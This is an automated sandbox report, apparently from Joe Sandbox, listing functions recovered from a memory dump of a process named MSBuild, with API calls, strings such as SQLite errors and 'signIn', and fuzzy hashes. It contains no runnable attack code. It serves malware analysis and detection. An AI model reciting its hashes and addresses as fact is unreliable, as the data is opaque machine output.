Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50

Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 004028F3
abs.MSVCRT ref: 004029E3
abs.MSVCRT ref: 00402A13
log.MSVCRT ref: 00402AAF
log.MSVCRT ref: 00402AC0
free.MSVCRT ref: 00402ADC
free.MSVCRT ref: 00402AEE

Strings

, xrefs: 00402919

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$wcslen
String ID:
API String ID: 3592753638-3916222277
Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D

Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A47B
_snwprintf.MSVCRT ref: 0040A4AE
wcslen.MSVCRT ref: 0040A4BA
memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
wcslen.MSVCRT ref: 0040A4E0
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3

Strings

%s (%s), xrefs: 0040A4A3
YV@, xrefs: 0040A480, 0040A4D7, 0040A4F8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)$YV@
API String ID: 3979103747-598926743
Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9

Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
wcslen.MSVCRT ref: 0040A6B1
wcscpy.MSVCRT ref: 0040A6C1
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
wcscpy.MSVCRT ref: 0040A6DB

Strings

Unknown Error, xrefs: 0040A6D3
netmsg.dll, xrefs: 0040A681

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: Unknown Error$netmsg.dll
API String ID: 2767993716-572158859
Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D

Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

wcscpy.MSVCRT ref: 0040DAFB
wcscpy.MSVCRT ref: 0040DB0B
GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C

Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679

Strings

rtl, xrefs: 0040DB16
TranslatorURL, xrefs: 0040DB54
general, xrefs: 0040DB00
TranslatorName, xrefs: 0040DB40
charset, xrefs: 0040DB2A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E

Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000000,?,00000020), ref: 0042F6B8
memset.MSVCRT ref: 0042F6F3

Strings

cannot ATTACH database within transaction, xrefs: 0042F663
unable to open database: %s, xrefs: 0042F84E
out of memory, xrefs: 0042F865
database %s is already in use, xrefs: 0042F6C5
attached databases must use the same text encoding as main database, xrefs: 0042F76F
too many attached databases - max %d, xrefs: 0042F64D
database is already attached, xrefs: 0042F721

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59

Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B

??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

Strings

(, xrefs: 0040EBE1
d, xrefs: 0040EC38

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: ($d
API String ID: 1140211610-1915259565
Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48

Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
Sleep.KERNEL32(00000001), ref: 004178E9
GetLastError.KERNEL32 ref: 004178FB
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E

Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407E44
memset.MSVCRT ref: 00407E5B
_mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
_mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
_mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
_mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
wcscpy.MSVCRT ref: 00407F10
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
String ID:
API String ID: 59245283-0
Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55

Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
GetLastError.KERNEL32 ref: 0041855C
Sleep.KERNEL32(00000064), ref: 00418571
DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
GetFileAttributesA.KERNEL32(00000000), ref: 00418581
GetLastError.KERNEL32 ref: 0041858E
Sleep.KERNEL32(00000064), ref: 004185A3
free.MSVCRT ref: 004185AC

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastSleep$free
String ID:
API String ID: 2802642348-0
Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E

Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(004032AB,",0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
memcpy.MSVCRT(004032AB,&,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC

Strings

°, xrefs: 00414ECD
", xrefs: 00414EB0
>, xrefs: 00414EA1
&, xrefs: 00414EDC
<, xrefs: 00414E93
<br>, xrefs: 00414EF6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F

Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
memset.MSVCRT ref: 00413ADC
memset.MSVCRT ref: 00413AEC

Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982

memset.MSVCRT ref: 00413BD7
wcscpy.MSVCRT ref: 00413BF8
CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E

Strings

3A, xrefs: 00413C21, 00413B62

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID: 3A
API String ID: 3300951397-293699754
Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA

Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
wcscpy.MSVCRT ref: 0040D1B5

Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647

wcslen.MSVCRT ref: 0040D1D3
GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
LoadStringW.USER32(00000000,?,?), ref: 0040D20C
memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C

Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126

Strings

strings, xrefs: 0040D1AB

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411AF6

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

wcsrchr.MSVCRT ref: 00411B14
wcscat.MSVCRT ref: 00411B2E

Strings

.cfg, xrefs: 00411B28
General, xrefs: 00411B38
EA, xrefs: 00411B4A
AE, xrefs: 00411B6D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: AE$.cfg$General$EA
API String ID: 776488737-1622828088
Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99

Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D8BD
GetDlgCtrlID.USER32(?), ref: 0040D8C8
GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
memset.MSVCRT ref: 0040D906
GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
_wcsicmp.MSVCRT ref: 0040D92F

Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F

Strings

sysdatetimepick32, xrefs: 0040D929

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
String ID: sysdatetimepick32
API String ID: 1028950076-4169760276
Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59

Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
memset.MSVCRT ref: 0041BA3D

Strings

-journal, xrefs: 0041B935
-wal, xrefs: 0041B96A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99

Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405C27
GetDlgItem.USER32(?,000003E9), ref: 00405C3A
GetDlgItem.USER32(?,000003E9), ref: 00405C4F
GetDlgItem.USER32(?,000003E9), ref: 00405C67
EndDialog.USER32(?,00000002), ref: 00405C83
EndDialog.USER32(?,00000001), ref: 00405C98

Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964

SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59

Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00444D09
_wcsicmp.MSVCRT ref: 00444D1E
_wcsicmp.MSVCRT ref: 00444D33

Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B

Strings

log profile, xrefs: 00444C97
http://, xrefs: 00444CC0
https://, xrefs: 00444CCB
.save, xrefs: 00444D03
signIn, xrefs: 00444D2D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp$wcslen$_memicmp
String ID: .save$http://$https://$log profile$signIn
API String ID: 1214746602-2708368587
Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D

Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
memset.MSVCRT ref: 00405E33
??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
SetFocus.USER32(?,?,?,?), ref: 00405EB8
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4

Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00405F65
GetWindow.USER32(?,00000005), ref: 00405F7D
GetWindow.USER32(00000000), ref: 00405F80

Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748

GetWindow.USER32(00000000,00000002), ref: 00405F8C
GetDlgItem.USER32(?,0000040C), ref: 00405FA2
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
GetDlgItem.USER32(?,0000040E), ref: 00405FEB
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Window$ItemMessageRectSend$Client
String ID:
API String ID: 2047574939-0
Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9

Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA

memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
memcpy.MSVCRT(?,?,00000040), ref: 0044A988

Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
